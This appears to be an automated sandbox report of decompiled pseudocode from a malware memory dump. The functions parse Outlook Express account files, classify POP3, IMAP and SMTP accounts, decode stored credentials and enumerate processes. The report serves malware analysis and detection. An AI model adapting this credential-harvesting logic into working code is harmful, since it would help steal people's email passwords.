                                                                                              Function 004044DA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 66%
                                                                                              			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t44;
				intOrPtr _t50;
				void* _t56;
				intOrPtr _t58;
				void* _t63;

				_t63 = __fp0;
				_t50 = __ecx;
				_v8 = __ecx;
				E004021D8( &_v940);
				_t58 = _a4;
				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
				_push(_t58 + 0x404);
				_t44 = 0x7f;
				E004060D0(_t44,  &_v796);
				E004060D0(_t44,  &_v408, _t58 + 0x204);
				E004060D0(_t44,  &_v928, _t58 + 4);
				E004060D0(_t44,  &_v668, _t58 + 0x104);
				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
				_t56 = _t58 + 0x504;
				_push("pop3");
				_push(_t56);
				L004115B2();
				if(_t37 != 0) {
					_push("imap");
					_push(_t56);
					L004115B2();
					if(_t37 != 0) {
						_push("smtp");
						_push(_t56);
						L004115B2();
						if(_t37 == 0) {
							_v412 = 4;
						}
					} else {
						_v412 = 2;
					}
				} else {
					_v412 = 1;
				}
				_v24 =  *((intOrPtr*)(_t58 + 0x804));
				_v20 =  *((intOrPtr*)(_t58 + 0x808));
				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
			}























                                                                                              0x004044da
                                                                                              0x004044e6
                                                                                              0x004044ee
                                                                                              0x004044f1
                                                                                              0x004044fc
                                                                                              0x004044ff
                                                                                              0x0040450b
                                                                                              0x0040450e
                                                                                              0x00404515
                                                                                              0x00404527
                                                                                              0x00404536
                                                                                              0x00404548
                                                                                              0x0040455a
                                                                                              0x0040455f
                                                                                              0x00404565
                                                                                              0x0040456a
                                                                                              0x0040456b
                                                                                              0x00404575
                                                                                              0x00404583
                                                                                              0x00404588
                                                                                              0x00404589
                                                                                              0x00404592
                                                                                              0x004045a0
                                                                                              0x004045a5
                                                                                              0x004045a6
                                                                                              0x004045af
                                                                                              0x004045b1
                                                                                              0x004045b1
                                                                                              0x00404594
                                                                                              0x00404594
                                                                                              0x00404594
                                                                                              0x00404577
                                                                                              0x00404577
                                                                                              0x00404577
                                                                                              0x004045c1
                                                                                              0x004045ca
                                                                                              0x004045e5

                                                                                              APIs
                                                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                              • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                                                              • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _stricmp$memcpystrlen
                                                                                              • String ID: imap$pop3$smtp
                                                                                              • API String ID: 445763297-821077329
                                                                                              • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                              • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                                                              • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                              • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004036CC, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v132;
				char _v404;
				char _v532;
				intOrPtr _v536;
				char _v920;
				intOrPtr _v924;
				char _v1052;
				char _v1064;
				void* __ebx;
				void* _t18;
				char* _t20;
				char* _t39;
				char* _t41;
				void* _t48;
				void* _t59;

				_t59 = __fp0;
				_t48 = __edi;
				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
					return _t18;
				}
				_t39 =  &_v132;
				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
				if(_t20 != 0) {
					_v5 = 0;
					_t20 = strchr(_t39, 0x3a);
					_t41 = _t20;
					if(_t41 != 0) {
						 *_t41 = 0;
						E004021D8( &_v1064);
						strcpy( &_v404,  &(_t41[1]));
						strcpy( &_v532,  &_v132);
						_v924 = 7;
						_v536 = 3;
						if(strlen( &_v532) + 0xa < 0x7f) {
							sprintf( &_v920, "%s@gmail.com",  &_v532);
						}
						strcpy( &_v1052,  &_v532);
						_t20 = E00402407( &_v1064, _t59, _t48);
					}
				}
				return _t20;
			}



















                                                                                              0x004036cc
                                                                                              0x004036cc
                                                                                              0x004036dc
                                                                                              0x004037ae
                                                                                              0x004037ae
                                                                                              0x004036ed
                                                                                              0x004036f0
                                                                                              0x004036f7
                                                                                              0x00403702
                                                                                              0x00403706
                                                                                              0x0040370b
                                                                                              0x00403711
                                                                                              0x0040371e
                                                                                              0x00403721
                                                                                              0x0040372f
                                                                                              0x0040373f
                                                                                              0x0040374b
                                                                                              0x00403755
                                                                                              0x0040376e
                                                                                              0x00403783
                                                                                              0x00403788
                                                                                              0x00403799
                                                                                              0x004037a7
                                                                                              0x004037a7
                                                                                              0x00403711
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                                • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                                • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                                                                • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                              • strchr.MSVCRT ref: 00403706
                                                                                              • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                                                              • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                                                              • strlen.MSVCRT ref: 0040375F
                                                                                              • sprintf.MSVCRT ref: 00403783
                                                                                              • strcpy.MSVCRT(?,?), ref: 00403799
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                              • String ID: %s@gmail.com
                                                                                              • API String ID: 2649369358-4097000612
                                                                                              • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                              • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                                                              • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                              • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040684D, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
				char _v8;
				void _v1031;
				void _v1032;
				void* _t26;
				char* _t27;
				int _t32;
				int _t38;
				char* _t43;
				int _t44;
				void* _t45;
				void** _t48;
				void* _t50;
				void* _t51;

				_t43 = __ebx;
				_t44 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				_t26 = _a8;
				_t51 = _t50 + 0xc;
				 *__ebx = 0;
				if(_t26 > 0) {
					_t48 = _a4 + 4;
					_v8 = _t26;
					do {
						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
						_t32 = strlen( &_v1032);
						_a8 = _t32;
						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
						_t45 = _t44 + _a8 + 1;
						_t38 = strlen( *_t48);
						_a8 = _t38;
						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
						_t51 = _t51 + 0x30;
						_t48 =  &(_t48[2]);
						_t18 =  &_v8;
						 *_t18 = _v8 - 1;
						_t44 = _t45 + _a8 + 1;
					} while ( *_t18 != 0);
				}
				_t27 = _t44 + _t43;
				 *_t27 = 0;
				 *((char*)(_t27 + 1)) = 0;
				return _t43;
			}
















                                                                                              0x0040684d
                                                                                              0x0040685c
                                                                                              0x00406866
                                                                                              0x0040686d
                                                                                              0x00406872
                                                                                              0x00406875
                                                                                              0x0040687a
                                                                                              0x0040687d
                                                                                              0x00406883
                                                                                              0x00406886
                                                                                              0x00406889
                                                                                              0x0040689a
                                                                                              0x004068a6
                                                                                              0x004068ab
                                                                                              0x004068bb
                                                                                              0x004068c5
                                                                                              0x004068c9
                                                                                              0x004068ce
                                                                                              0x004068d9
                                                                                              0x004068e1
                                                                                              0x004068e4
                                                                                              0x004068e7
                                                                                              0x004068e7
                                                                                              0x004068ea
                                                                                              0x004068ea
                                                                                              0x004068f0
                                                                                              0x004068f1
                                                                                              0x004068f4
                                                                                              0x004068f7
                                                                                              0x004068ff

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpystrlen$memsetsprintf
                                                                                              • String ID: %s (%s)
                                                                                              • API String ID: 3756086014-1363028141
                                                                                              • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                              • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                                                              • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                              • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E906, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 25%
                                                                                              			E0040E906(void* __ebx, int _a4, void* _a8) {
				char _v20;
				char _v36;
				char _v52;
				void* _t15;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				int _t32;

				_t28 = __ebx;
				_t31 = __imp__UuidFromStringA;
				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
					return 0;
				} else {
					_t32 = _a4;
					if(_t32 > 0x7e) {
						_t32 = 0x7e;
					}
					memcpy(_t28, _a8, _t32);
					 *((char*)(_t28 + _t32)) = 0;
					__imp__CoTaskMemFree(_a8);
					return 1;
				}
			}











                                                                                              0x0040e906
                                                                                              0x0040e90d
                                                                                              0x0040e91d
                                                                                              0x0040e92a
                                                                                              0x0040e92e
                                                                                              0x00000000
                                                                                              0x0040e956
                                                                                              0x0040e956
                                                                                              0x0040e95c
                                                                                              0x0040e960
                                                                                              0x0040e960
                                                                                              0x0040e966
                                                                                              0x0040e971
                                                                                              0x0040e975
                                                                                              0x00000000
                                                                                              0x0040e97d

                                                                                              APIs
                                                                                              • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                              • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                              • memcpy.MSVCRT ref: 0040E966
                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                              Strings
                                                                                              • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                                                              • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                              • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                              • API String ID: 1640410171-3316789007
                                                                                              • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                              • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                                                              • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                              • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410BC7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 94%
                                                                                              			E00410BC7(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t12;
				void* _t15;
				char* _t19;
				void* _t25;
				void* _t28;
				long _t31;

				_t12 = E00405ECB(_a8);
				_a8 = _t12;
				if(_t12 != 0xffffffff) {
					_t31 = GetFileSize(_t12, 0);
					_t37 = _t31 - 2;
					if(_t31 > 2) {
						_t3 = _t31 + 2; // 0x2
						_t15 = _t3;
						L004115D0();
						_t25 = _t15;
						_t28 = _t15;
						SetFilePointer(_a8, 2, 0, 0);
						_t5 = _t31 - 2; // -2
						E004066F6(_t25, _a8, _t28, _t5);
						_t19 = _t28 + _t31;
						 *((char*)(_t19 - 2)) = 0;
						 *((char*)(_t19 - 1)) = 0;
						 *_t19 = 0;
						E00410A8A(_t25, _t37, _a4, _t28);
						_push(_t28);
						L004115D6();
					}
					return CloseHandle(_a8);
				}
				return _t12;
			}









                                                                                              0x00410bcd
                                                                                              0x00410bd6
                                                                                              0x00410bd9
                                                                                              0x00410be7
                                                                                              0x00410be9
                                                                                              0x00410bec
                                                                                              0x00410bee
                                                                                              0x00410bee
                                                                                              0x00410bf3
                                                                                              0x00410bf8
                                                                                              0x00410c00
                                                                                              0x00410c02
                                                                                              0x00410c08
                                                                                              0x00410c10
                                                                                              0x00410c18
                                                                                              0x00410c1f
                                                                                              0x00410c22
                                                                                              0x00410c25
                                                                                              0x00410c27
                                                                                              0x00410c2c
                                                                                              0x00410c2d
                                                                                              0x00410c33
                                                                                              0x00000000
                                                                                              0x00410c3e
                                                                                              0x00410c40

                                                                                              APIs
                                                                                                • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00410BF3
                                                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02
                                                                                                • Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D
                                                                                                • Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
                                                                                                • Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                                • Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                                • Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
                                                                                                • Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
                                                                                                • Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00410C2D
                                                                                              • CloseHandle.KERNEL32(?), ref: 00410C37
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                              • String ID: rA
                                                                                              • API String ID: 1886237854-474049127
                                                                                              • Opcode ID: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                              • Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
                                                                                              • Opcode Fuzzy Hash: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                              • Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409E32, Relevance: 10.5, APIs: 7, Instructions: 43windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                                              0x00409e38

                                                                                              APIs
                                                                                                • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                                • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                              • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                              • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                              • SendMessageA.USER32 ref: 00409EBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                              • String ID:
                                                                                              • API String ID: 3673709545-0
                                                                                              • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                              • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                                                              • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                              • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409E33, Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                                              0x00409e38

                                                                                              APIs
                                                                                                • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                                • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                              • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                              • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                              • SendMessageA.USER32 ref: 00409EBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                              • String ID:
                                                                                              • API String ID: 3673709545-0
                                                                                              • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                              • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                                                              • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                              • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407D0A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 92%
                                                                                              			E00407D0A(void* __eflags, struct HWND__* _a4) {
				void _v4103;
				char _v4104;
				void* _t8;
				void* _t17;

				_t8 = E004118A0(0x1004, _t17);
				_t21 =  *0x4171b8;
				if( *0x4171b8 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					sprintf(0x4172c0, "dialog_%d",  *0x417300);
					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00407CAD, 0);
				}
				return _t8;
			}







                                                                                              0x00407d12
                                                                                              0x00407d17
                                                                                              0x00407d1e
                                                                                              0x00407d2e
                                                                                              0x00407d35
                                                                                              0x00407d4a
                                                                                              0x00407d65
                                                                                              0x00407d71
                                                                                              0x00407d71
                                                                                              0x00000000
                                                                                              0x00407d81
                                                                                              0x00407d88

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00407D35
                                                                                              • sprintf.MSVCRT ref: 00407D4A
                                                                                                • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                                                                • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                                                                • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                                                              • EnumChildWindows.USER32 ref: 00407D81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                              • String ID: caption$dialog_%d
                                                                                              • API String ID: 246480800-4161923789
                                                                                              • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                              • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                                                              • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                              • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E255, Relevance: 9.1, APIs: 6, Instructions: 142stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 35%
                                                                                              			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				unsigned int _v16;
				int _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v308;
				intOrPtr _v312;
				void _v316;
				void _v579;
				char _v580;
				char _v844;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char _v1132;
				char _v17516;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t64;
				void* _t77;
				intOrPtr _t84;
				void _t94;
				int _t102;
				void* _t106;
				void* _t107;

				E004118A0(0x446c, __ecx);
				_t102 = 0;
				_v20 = 0;
				if(E0040629C() == 0 ||  *0x417518 == 0) {
					if( *0x417514 != _t102) {
						_t94 = _a4;
						_t63 =  *0x416fe0(8, _t94);
						_v8 = _t63;
						if(_t63 != 0xffffffff) {
							_v20 = 1;
							_v1132 = 0x224;
							_t64 =  *0x416fd8(_t63,  &_v1132);
							while(_t64 != 0) {
								memset( &_v316, _t102, 0x118);
								_v312 = _v1104;
								_v316 = _t94;
								strcpy( &_v308,  &_v844);
								_v44 = _v1108;
								_t107 = _t107 + 0x14;
								_v40 = _v1112;
								_v1132 = 0x224;
								if(E0040E45F(_a8,  &_v316) != 0) {
									_t64 =  *0x416fd4(_v8,  &_v1132);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t77 = OpenProcess(0x410, 0, _a4);
					_v8 = _t77;
					if(_t77 != 0) {
						_push( &_v16);
						_push(0x4000);
						_push( &_v17516);
						_push(_t77);
						if( *0x416fe4() != 0) {
							_t6 =  &_v16;
							 *_t6 = _v16 >> 2;
							_v20 = 1;
							_v12 = 0;
							if( *_t6 != 0) {
								while(1) {
									_v580 = 0;
									memset( &_v579, _t102, 0x104);
									memset( &_v316, _t102, 0x118);
									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
									_t107 = _t107 + 0x18;
									_v316 = _a4;
									_v312 = _t84;
									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
									E0040E172( &_v308,  &_v580);
									_push(0xc);
									_push( &_v32);
									_push(_v312);
									_push(_v8);
									if( *0x416fe8() != 0) {
										_v44 = _v28;
										_v40 = _v32;
									}
									if(E0040E45F(_a8,  &_v316) == 0) {
										goto L18;
									}
									_v12 = _v12 + 1;
									if(_v12 < _v16) {
										_t102 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v8);
					}
				}
				return _v20;
			}
































                                                                                              0x0040e25d
                                                                                              0x0040e265
                                                                                              0x0040e267
                                                                                              0x0040e271
                                                                                              0x0040e395
                                                                                              0x0040e39b
                                                                                              0x0040e3a1
                                                                                              0x0040e3aa
                                                                                              0x0040e3ad
                                                                                              0x0040e3c0
                                                                                              0x0040e3c7
                                                                                              0x0040e3cd
                                                                                              0x0040e44a
                                                                                              0x0040e3e2
                                                                                              0x0040e3ed
                                                                                              0x0040e401
                                                                                              0x0040e407
                                                                                              0x0040e412
                                                                                              0x0040e41b
                                                                                              0x0040e41e
                                                                                              0x0040e42b
                                                                                              0x0040e438
                                                                                              0x0040e444
                                                                                              0x00000000
                                                                                              0x0040e444
                                                                                              0x00000000
                                                                                              0x0040e438
                                                                                              0x00000000
                                                                                              0x0040e44a
                                                                                              0x0040e3ad
                                                                                              0x0040e283
                                                                                              0x0040e28c
                                                                                              0x0040e294
                                                                                              0x0040e297
                                                                                              0x0040e2a0
                                                                                              0x0040e2a1
                                                                                              0x0040e2ac
                                                                                              0x0040e2ad
                                                                                              0x0040e2b6
                                                                                              0x0040e2bc
                                                                                              0x0040e2bc
                                                                                              0x0040e2c0
                                                                                              0x0040e2c7
                                                                                              0x0040e2ca
                                                                                              0x0040e2d9
                                                                                              0x0040e2e2
                                                                                              0x0040e2e9
                                                                                              0x0040e2fb
                                                                                              0x0040e306
                                                                                              0x0040e30d
                                                                                              0x0040e311
                                                                                              0x0040e322
                                                                                              0x0040e328
                                                                                              0x0040e33a
                                                                                              0x0040e33f
                                                                                              0x0040e344
                                                                                              0x0040e345
                                                                                              0x0040e34b
                                                                                              0x0040e356
                                                                                              0x0040e35b
                                                                                              0x0040e361
                                                                                              0x0040e361
                                                                                              0x0040e375
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e37b
                                                                                              0x0040e384
                                                                                              0x0040e2d7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e38a
                                                                                              0x00000000
                                                                                              0x0040e384
